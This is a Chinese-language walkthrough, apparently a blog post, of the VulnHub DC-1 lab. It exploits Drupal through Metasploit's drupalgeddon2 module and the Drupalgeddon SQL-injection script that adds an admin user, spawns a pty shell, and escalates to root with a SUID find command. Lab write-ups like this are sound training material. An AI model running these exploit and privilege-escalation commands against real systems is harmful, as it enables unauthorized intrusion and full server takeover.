VulnHub — DC-1

信息收集

 

主机发现

 不清楚什么原因,这个靶机的ip一直扫不到 偶尔又扫到了,不知道什么问题

既然扫到了, 就不管了,80端口开了 

信息收集

直接访问网站扫目录

 Drupal 是使用PHP语言编写的开源内容管理框架(CMF),由内容管理系统(CMS)和PHP开发框架共同构成。 形象的说Drupal是一个福袋CMS的PHP开发框架

msf漏洞发现

1启动:msfconsole

2搜索利用脚本:search Drupal

3进入利用脚本:use

4查看需要参数:show opitons

5设置参数:set

6执行攻击:run

msf启动 然后search一下 找exp 

不少东西,其实可以试试用哪个,这里就直接用drupal_drupalgeddon2 也就是序号4

看options 只需要配置RHOSTS 也就是靶机地址

payload也已经配置好了

session 传入 直接进入shell

查看权限www-data 进入交互式

python -c 'import pty;pty.spawn("/bin/bash")'

SUID提权(find)


Set User ID是一种权限类型,允许用户使用指定用户的权限执行文件。那些具有suid权限的文件以最高的权限运行。假设我们以非root用户身份访问目标系统,井且我们发现二进制文件启用了suid位,那么这些文件/程序/命令可以root权限运行. SUID的目的就是:让本来没有相应权限的用户运行这个程序时,可以访问他没有权限访问的资源。
 

1、查看具有SUID的二进制可执行文件 
find / -user root -perm -4000 -print 2>/dev/null

2、一直可用来提权的linux可行性的文件列表如下:
Nmap 、 Vim 、 find 、 Bash 、 More 、 Less 、Nano 、 cp

3、利用find获得root权限shell 
find / -name cron.php -exec "/bin/sh" \;

寻找可利用的文件,find 可以

如何利用find来进行SUID提权 

find / -name cron.php -exec "/bin/sh" \;

前半段是为了能顺利执行find 命令, 后面就是提权利用了 

拿到root 去find flag

find / -name "*flag*.txt"

Drupal 攻击脚本的利用 

Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) - PHP webapps Exploit

Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)

这个版本范围存在的漏洞,脚本下载即可 在kali机上直接打

设置用户名密码 123456 

python2 34992.py -t http://192.168.164.136 -u 123456 -p 123456   

 攻击成功生成 url ,直接去登录即可 ,就是管理员后台了 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值